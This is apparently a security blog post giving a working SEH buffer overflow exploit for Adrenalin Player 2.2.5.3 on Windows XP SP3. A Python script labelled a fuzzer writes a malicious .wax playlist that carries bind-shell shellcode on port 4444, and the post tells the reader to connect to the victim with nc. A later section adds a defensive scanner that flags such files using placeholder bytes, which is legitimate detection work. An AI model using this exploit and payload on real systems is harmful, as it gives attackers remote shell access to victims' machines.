Adrenalin Player is a music player application with a user interface like Winamp. Adrenalin Player supports many file formats, such as mp3, mp4, asf, m3u, pls and wax. Yesterday I tried to make an exploit for this application.
This is the fuzzer:
#!/usr/bin/python
# Title: Adrenalin Player (SEH) Buffer Overflow
# software: Adrenalin Player
# version : 2.2.5.3
# Platform: Windows XP sp3
# Date: June 16th, 2013
# Author: onying (@onyiing)
# Blog : http://itsecuritynewbie.blogspot.com/
# Thanks to: Information Security Shinobi Camp | http://www.is2c-dojo.com

junk = "\x90" * 2140                  # filler up to the SEH record
junk += "\xeb\x06\x90\x90"            # nSEH: jmp short, skips over the handler address
junk += "\x13\xf3\x16\x10"            # SEH handler: POP POP RETN
junk += "\x90" * 16                   # NOP padding before shellcode
# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNa
junk += (
    "\xbb\x25\xaa\xd2\xa3\x2b\xc9\xda\xd6\xd9\x74\x24\xf4\x5e\xb1\x51"
    "\x31\x5e\x10\x83\xee\xfc\x03\x7b\xa6\x30\x56\x7f\xdc\x5f\xd4\x97"
    "\xd8\x5f\x18\x98\x7b\x2b\x8b\x42\x58\xa0\x11\xb6\x2b\xca\x9c\xbe"
    "\x2a\xdc\x14\x71\x35\xa9\x74\xad\x44\x46\xc3\x26\x72\x13\xd5\xd6"
    "\x4a\xe3\x4f\x8a\x29\x23\x1b\xd5\xf0\x6e\xe9\xd8\x30\x85\x06\xe1"
    "\xe0\x7e\xcf\x60\xec\xf4\x50\xae\xef\xe1\x09\x25\xe3\xbe\x5e\x66"
    "\xe0\x41\x8a\x9b\x34\xc9\xc5\xf7\x60\xd1\xb4\xc4\x58\x32\x52\x41"
    "\xd9\xf4\x10\x15\xd2\x7f\x56\x89\x47\xf4\xd7\xb9\xc9\x63\x56\xf7"
    "\xfb\x9f\x36\xf8\xd2\x06\xe4\x60\xb3\xf5\x38\x04\x34\x89\x0e\x8b"
    "\xee\x92\xbf\x5b\xc4\x80\xbc\xa0\x8a\xa5\xeb\x89\xa3\xbf\x72\xb4"
    "\x59\x37\x79\xe3\xcb\x4a\x82\xdb\x64\x92\x75\x2e\xd9\x73\x79\x06"
    "\x71\x2f\xd6\xf5\x25\x8c\x8b\xba\x9a\xed\xfc\x5a\x75\x03\xa1\xc4"
    "\xd6\xaa\xb8\x9d\xb1\x08\x20\xed\x86\x06\xaa\xdb\x63\xb9\x05\xb6"
    "\x8c\x69\xcd\x9c\xde\xa4\xe7\x8b\xdf\x6f\xa4\x66\xdf\x40\x23\x6d"
    "\x56\xe7\xfd\x3a\x96\x31\xad\x90\x3c\xeb\xb1\xc8\x2e\x7b\xa9\x91"
    "\x96\x05\x62\x9e\xc1\xa3\x73\xb0\x88\x21\xe8\x56\x3d\xd5\x9d\x1f"
    "\x58\x73\x0e\x46\x8a\x48\x27\x9f\xa6\x14\xb1\xbd\x06\x55\x32\xeb"
    "\x97\x17\x98\x15\x25\xb4\x71\x64\xd0\xfc\xde\xdd\x8e\x95\x52\xdf"
    "\x62\x73\x6c\x6a\xc1\x83\x44\xcf\x9e\x29\x38\xbe\x71\xa4\xbb\x11"
    "\x23\x6d\xed\x6e\x13\xe5\xa0\x49\x91\x38\xe9\x96\x4c\xae\xf1\x97"
    "\x46\xd0\xde\xec\xfe\xd2\x5c\x36\x64\xd4\xb5\xe4\x9a\xfa\x52\x76"
    "\xbd\x19\xd1\xd5\xc2\x08\xe9\x09"
)
junk += "\x90" * (3000 - len(junk))   # pad the file out to 3000 bytes

file = open("adrenalin.wax", "w")
file.write(junk)
file.close()
This fuzzer creates a file named adrenalin with the .wax file extension. Once the application has been exploited, just connect with nc to port 4444 on the target IP (example: # nc 192.168.56.101 4444).
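For the defensive side, here is an added example (not code from the original post) that scans a playlist file for the fingerprints of this kind of malformed input: an oversized file, a long NOP sled, a jmp short sitting right behind the sled, and a high ratio of non-printable bytes in what should be a small text format. The thresholds, the benign ASX sample and the suspicious sample (which uses placeholder bytes instead of a handler address or a payload) are all constructed for this example.

```python
import re

# Thresholds are assumptions chosen for this example, not values from the post.
MAX_SANE_SIZE = 2048      # a real ASX/WAX playlist is a small XML text file
NOP_SLED_MIN = 32         # a run of 0x90 this long never appears in text
TEXT_OK = set(b"\t\n\r")  # control bytes that are normal in a text playlist


def scan_playlist(data: bytes) -> list:
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    if len(data) > MAX_SANE_SIZE:
        findings.append("oversized playlist: %d bytes" % len(data))

    sled = re.search(rb"\x90{%d,}" % NOP_SLED_MIN, data)
    if sled:
        findings.append("NOP sled of %d bytes at offset %d"
                        % (len(sled.group(0)), sled.start()))

    # nSEH-style "jmp short" placed directly behind a sled, as in the PoC layout
    if re.search(rb"\x90{16,}\xeb\x06", data):
        findings.append("jmp short after NOP sled (nSEH overwrite pattern)")

    nonprint = sum(1 for b in data
                   if b not in TEXT_OK and (b < 0x20 or b > 0x7e))
    if data and nonprint * 10 > len(data):
        findings.append("%d non-printable bytes in a text format" % nonprint)
    return findings


# Constructed samples (not files from the post).
BENIGN_WAX = (b'<ASX version="3.0">\r\n'
              b'<Entry><Ref href="http://example.invalid/stream.wma"/></Entry>\r\n'
              b'</ASX>\r\n')


def build_suspicious_sample() -> bytes:
    """Same byte layout as the PoC, with placeholders for handler and payload."""
    buf = b"\x90" * 2140
    buf += b"\xeb\x06\x90\x90"   # nSEH slot
    buf += b"BBBB"               # placeholder where a handler address would sit
    buf += b"\x90" * 16
    buf += b"\xcc" * 344         # int3 bytes stand in for a payload
    return buf + b"\x90" * (3000 - len(buf))


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_WAX),
                       ("suspicious", build_suspicious_sample())):
        print(name, scan_playlist(blob) or "clean")
```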
File download: Adrenalin Player
Exploit-DB: fuzzer
1337day.com: 1337day.com